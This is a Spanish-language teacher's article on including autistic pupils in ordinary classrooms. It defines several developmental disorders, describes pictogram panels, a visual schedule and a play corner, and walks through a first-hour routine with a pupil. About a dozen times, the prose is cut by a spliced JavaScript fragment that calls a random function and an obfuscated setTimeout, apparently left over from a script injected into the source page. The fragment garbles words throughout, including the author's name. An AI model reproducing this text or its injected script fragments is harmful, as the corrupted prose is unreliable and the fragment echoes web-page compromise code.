EL AUTISMO EN LAS AULAS

                                                                                         Autora: Yolandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anda Orellana Muñoz                                                            

                  El mundo del Autismo es aún bastante desconocido en los centros públicos . En este artículo pretendo dar pequeñas pinceladas, para dar a conocer las características principales del autismo, y en base a ellas poder trabajar  con estos alumnos, proporcionándoles  una educación adecuada e integradora. Muestro material personal , que utilizo a diario en mis clases y un caso práctico de la primera hora en el centro trabajandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando con un alumno autista dentro del aula.

Es una realidad la existencia cada vez mayor de niños con Autismo, también conocido como Trastorno Generalizado del Desarrollo.

El aumento de llegadas a los centros de niños con este Trastorno hace urgente la necesidad de una formación por parte del profesorado, ya que la mayoría de los centros de carácter ordinario cuentan con pocos especialistas y recursos para atender a estos alumnos , y es por lo que todo el claustro debe tener ciertas nociones sobre cómo entender y ayudar a estos alumnos.

Primero comenzaremos con una pequeña definición de Autismo , para continuar posteriormente con algunas pautas de actuación y fotos de material que puede ayudar mucho al profesorado para una adecuada  integración de niños Autistas en el Aula.

            La palabra autismo viene del Griego (Autos) que significa sumidos en si mismo:

“ Gente por todas partes

Hablandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando, llevandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando ropas chillonas

Sus diálogos son como el martilleo de

Los cascos de un caballo.

Los colores son cegadores

La charla me hace daño en los oídos

La brillantez  me hace daño en los ojos.

Oh! ¿Por qué la gente no será más silenciosa

Y llevar colores más apagados?

Este poema lo escribió Dianne Mear (1994), estudiante con Síndrome de Asperger, uno de los diversos tipos de autismos existentes. Algunas características de las personas con autismo es el rechazo a determinados sonidos, texturas o incluso colores como nos relata Dianne en su poema.

El autismo es una palabra o mejor dicho una etiqueta que engloba a individuos con características diferentes. Sin embargo podemos decir que presentan una alteración similar en el área de la comunicación, social, lenguaje y conducta. Estos se diferencian en el grado y la intensidad en que están afectadas.

El autismo es un trastorno complejo y por ello creo que es importante conocer brevemente los diversos tipos existentes:

1.- Trastorno del Espectro Autista :

            Las características principales  es que son niños que padecen una aislada soledad, adherencia a rutinas o rituales, peculiaridades del  lenguaje y oposición a los cambios. Suelen presentar cierto rechazo a sonidos , texturas, al contacto físico, no suelen mirar a los ojos… Presentan también las llamadas “islas de competencias” que se refiere a que el niño muestra en algún área una habilidad normal o extraordinaria ( memoria, cálculo, aritmética….)

2.-  Trastorno de Rett:

            Las características principales de este trastorno es que está diagnosticado solo en mujeres, presentan Microcefalia , perdida de habilidades manuales y dificultades en las relaciones sociales.

3.- Trastorno de Asperger:

            Es similar al autismo con la salvedad de que no tiene afectada la capacidad cognitiva, y el lenguaje es formalmente correcto.

4.-Trastorno desintegrativo infantil:

            Se caracteriza principalmente por una regresión evolutiva, tras dos años de desarrollo normal. Se produce una pérdida significativa de habilidades previamente adquiridas en  por lo menos dos de las siguientes áreas(Lenguaje expresivo, habilidades sociales, control intestinal , juego y habilidades motoras).

Con este pequeño resumen ya nos hacemos una idea y podemos entender mejor a nuestro alumno con autismo.

Algunas pautas generales de Actuación en el Aula:

-       En primer lugar es importante informarnos bien de las características de nuestro alumno, y ver dentro de que tipo de Trastorno generalizado del desarrollo lo encuadramos.

-       En segundo lugar el material.

Los casos más complejos son los niños con TEA (Trastorno del espectro autista), necesitandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando mucha elaboración de material de aula y disposición de los espacios en la misma.

  • Material:

Los niños autistas suelen presentar alteraciones del lenguaje. Suele haber casos en los que no tiene adquirido el lenguaje oral y otros en los que tiene un lenguaje muy característico presentandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando ecolalias, alteración en el tono de voz, articulación…. Es por todo esto  por lo que es muy necesario el apoyo de estímulos visuales como son los pictogramas para facilitar así la comunicación y la comprensión.

Algunos de estos pictogramas podemos utilizarlos de esta forma:

 


Yo suelo utilizar paneles de comunicación que me facilitan mucho el trabajo, algunos de ellos son los siguientes:

 

En este panel contamos con una agenda visual  que encontramos en el lado derecho y que organiza las actividades que va a realizar el niño durante esa hora. De esta forma el alumno sabe en todo momento que va a hacer y evitamos así el nerviosismo y el descontrol del niño.

Todo este panel va a servir para realizar la rutina diaria que es  fundamental.

En la parte central tenemos para colocar la fecha diaria , con el dia- mes-año .

En la parte izquierda contamos con las fotos de todos nuestros alumnos y nos va a servir para pasar lista y que nuestro alumno con autismo coloque quien ha venido y quien está en casa.

 

 

Rincón del juego:

Este debe ser otro rincón fundamental en el aula, donde nuestro alumno autista pueda ir a trabajar, jugar o incluso relajarse y tranquilizarse cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando presente alguna rabieta… un ejemplo puede ser este.

 

 

Dependiendo del grado y la intensidad de afectación será necesario más o menos material visual..

 

CASO PRÁCTICO: (1ª hora)

Manuel llega a clase como todos los días acompañado de la cuidadora que se encarga de recogerlo en la entrada del colegio y llevarlo hasta su clase.

Trabajamos la rutina diaria: llamar a la puerta y decir buenos días al entrar y así lo hace.

Una vez dentro lo dirigimos hacia su agenda visual que se encuentra detrás de la puerta con fotos de todas las asignaturas de ese día así como del recreo, y salida del colegio.

De esta forma Manuel se relaja y sabe que va a hacer cada momento en el colegio.

La clase está decorada con los distintos paneles que mostré anteriormente. Dentro de su rutina diaria está también la fecha, estado del tiempo donde Manuel lo va colocandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando con los pictogramas a medida que lo comentamos con el resto de la clase.

Posteriormente comenzamos con la asamblea que se ha mantenido en primaria también y que entraría dentro de la rutina diaria, donde Manuel escucha y participa en la medida de lo posible. Para Finalizar la hora realizamos la ficha correspondiente y nuestro alumno su adaptación .

Antes de terminar la primera hora , lo llevamos a la agenda visual donde le mostramos que área y profesor le toca después, evitandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando así el nerviosismo y descontrol.

Esta sería la llegada de nuestro alumno al colegio, esperandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando transmitir  así una pequeña idea de cómo comenzar a trabajar con niños autistas y servir de ayuda a otros compañeros.

Los niños con Trastorno generalizado del desarrollo  pueden ser escolarizados en centros públicos que cuenten con un mínimo de recursos, es por lo que el profesorado debe intentar adquirir unos conocimientos mínimos y contribuir en la medida de lo posible a la integración y adaptación de estos alumnos.

 

BLIBLIOGRAFÍA:

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